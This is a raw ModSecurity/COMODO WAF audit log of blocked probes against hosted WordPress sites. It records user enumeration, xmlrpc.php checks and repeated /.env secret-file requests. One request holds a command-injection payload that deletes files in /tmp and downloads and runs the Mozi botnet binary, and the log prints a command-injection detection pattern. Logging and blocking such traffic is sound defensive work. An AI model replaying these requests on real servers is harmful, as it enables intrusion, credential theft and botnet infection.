[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369918207797 2884 (- - -) Stopwatch2: 1746369918207797 2884; combined=1264, p1=451, p2=781, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47847607-Z-- --a73db223-A-- [04/May/2025:21:45:26 +0700] aBd9hvnZiHJYHUAF8QfmlAAAAAM 103.236.140.4 38516 103.236.140.4 8181 --a73db223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a73db223-C-- demo.sayHello --a73db223-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a73db223-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369926574245 4768 (- - -) Stopwatch2: 1746369926574245 4768; combined=3630, p1=447, p2=2988, p3=22, p4=24, p5=88, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a73db223-Z-- --c9f5db0c-A-- [04/May/2025:21:45:38 +0700] aBd9ktsVQyl9V2B8Pt_CPQAAAFM 103.236.140.4 38520 103.236.140.4 8181 --c9f5db0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c9f5db0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9f5db0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369938807480 2733 (- - -) Stopwatch2: 1746369938807480 2733; combined=1211, p1=429, p2=753, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9f5db0c-Z-- --b17d9d2c-A-- [04/May/2025:21:45:44 +0700] aBd9mNsVQyl9V2B8Pt_CPwAAAFQ 103.236.140.4 38524 103.236.140.4 8181 --b17d9d2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.239 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b17d9d2c-C-- demo.sayHello --b17d9d2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b17d9d2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369944277777 5483 (- - -) Stopwatch2: 1746369944277777 5483; combined=4053, p1=505, p2=3329, p3=27, p4=29, p5=95, sr=70, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b17d9d2c-Z-- --1f71860b-A-- [04/May/2025:21:58:18 +0700] aBeAitsVQyl9V2B8Pt_CTAAAAEQ 103.236.140.4 38632 103.236.140.4 8181 --1f71860b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.212.77 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.212.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1f71860b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f71860b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746370698450779 776 (- - -) Stopwatch2: 1746370698450779 776; combined=326, p1=283, p2=0, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f71860b-Z-- --f29eb30b-A-- [04/May/2025:22:05:17 +0700] aBeCLechPF6irSergtsE2AAAANA 103.236.140.4 38688 103.236.140.4 8181 --f29eb30b-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.86.236.60 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.86.236.60 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --f29eb30b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29eb30b-E-- --f29eb30b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746371117225101 2253 (- - -) Stopwatch2: 1746371117225101 2253; combined=671, p1=468, p2=171, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29eb30b-Z-- --b6527e66-A-- [04/May/2025:22:26:56 +0700] aBeHQPnZiHJYHUAF8QfmrAAAAAw 103.236.140.4 38842 103.236.140.4 8181 --b6527e66-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b6527e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6527e66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746372416566370 865 (- - -) Stopwatch2: 1746372416566370 865; combined=324, p1=284, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6527e66-Z-- --fbffc60e-A-- [04/May/2025:22:53:03 +0700] aBeNX2JEE9ao5dcyYWn6PAAAAIw 103.236.140.4 39750 103.236.140.4 8181 --fbffc60e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; CPH1801) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --fbffc60e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbffc60e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746373983424262 879 (- - -) Stopwatch2: 1746373983424262 879; combined=412, p1=370, p2=0, p3=0, p4=0, p5=42, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbffc60e-Z-- --a1cf0764-A-- [04/May/2025:23:37:01 +0700] aBeXrechPF6irSergtsHkQAAAM4 103.236.140.4 43896 103.236.140.4 8181 --a1cf0764-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 138.68.82.23 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a1cf0764-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1cf0764-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746376621941309 865 (- - -) Stopwatch2: 1746376621941309 865; combined=335, p1=293, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1cf0764-Z-- --d073e737-A-- [04/May/2025:23:42:17 +0700] aBeY6fnZiHJYHUAF8QfqNgAAABU 103.236.140.4 43918 103.236.140.4 8181 --d073e737-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d073e737-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d073e737-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746376937887765 3231 (- - -) Stopwatch2: 1746376937887765 3231; combined=1377, p1=487, p2=859, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d073e737-Z-- --00753c5e-A-- [04/May/2025:23:42:22 +0700] aBeY7vnZiHJYHUAF8QfqOAAAABY 103.236.140.4 43922 103.236.140.4 8181 --00753c5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00753c5e-C-- demo.sayHello --00753c5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00753c5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746376942132952 5451 (- - -) Stopwatch2: 1746376942132952 5451; combined=4099, p1=529, p2=3360, p3=28, p4=31, p5=90, sr=91, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00753c5e-Z-- --f3032563-A-- [04/May/2025:23:42:48 +0700] aBeZCPnZiHJYHUAF8QfqOwAAAAE 103.236.140.4 43928 103.236.140.4 8181 --f3032563-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3032563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3032563-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746376968146837 2340 (- - -) Stopwatch2: 1746376968146837 2340; combined=1360, p1=452, p2=876, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3032563-Z-- --f8fbc52e-A-- [04/May/2025:23:42:52 +0700] aBeZDPnZiHJYHUAF8QfqPQAAABQ 103.236.140.4 43932 103.236.140.4 8181 --f8fbc52e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8fbc52e-C-- demo.sayHello --f8fbc52e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8fbc52e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746376972161189 4830 (- - -) Stopwatch2: 1746376972161189 4830; combined=3782, p1=467, p2=3117, p3=25, p4=24, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8fbc52e-Z-- --916fd33d-A-- [04/May/2025:23:42:57 +0700] aBeZEfnZiHJYHUAF8QfqPwAAAAA 103.236.140.4 43936 103.236.140.4 8181 --916fd33d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --916fd33d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --916fd33d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746376977449134 2083 (- - -) Stopwatch2: 1746376977449134 2083; combined=1030, p1=365, p2=639, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916fd33d-Z-- --9b6ff76b-A-- [04/May/2025:23:43:00 +0700] aBeZFPnZiHJYHUAF8QfqQQAAAAg 103.236.140.4 43940 103.236.140.4 8181 --9b6ff76b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b6ff76b-C-- demo.sayHello --9b6ff76b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b6ff76b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746376980989518 4641 (- - -) Stopwatch2: 1746376980989518 4641; combined=3627, p1=445, p2=2985, p3=22, p4=24, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b6ff76b-Z-- --d23b7475-A-- [04/May/2025:23:43:27 +0700] aBeZL-chPF6irSergtsHkwAAAM0 103.236.140.4 43952 103.236.140.4 8181 --d23b7475-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d23b7475-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d23b7475-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377007317030 3084 (- - -) Stopwatch2: 1746377007317030 3084; combined=1364, p1=455, p2=879, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d23b7475-Z-- --d350e017-A-- [04/May/2025:23:43:32 +0700] aBeZNOchPF6irSergtsHlQAAANM 103.236.140.4 43956 103.236.140.4 8181 --d350e017-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d350e017-C-- demo.sayHello --d350e017-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d350e017-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377012498626 5274 (- - -) Stopwatch2: 1746377012498626 5274; combined=3956, p1=475, p2=3261, p3=29, p4=26, p5=96, sr=71, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d350e017-Z-- --fe501846-A-- [04/May/2025:23:43:36 +0700] aBeZOOchPF6irSergtsHlgAAANE 103.236.140.4 43960 103.236.140.4 8181 --fe501846-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe501846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe501846-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] 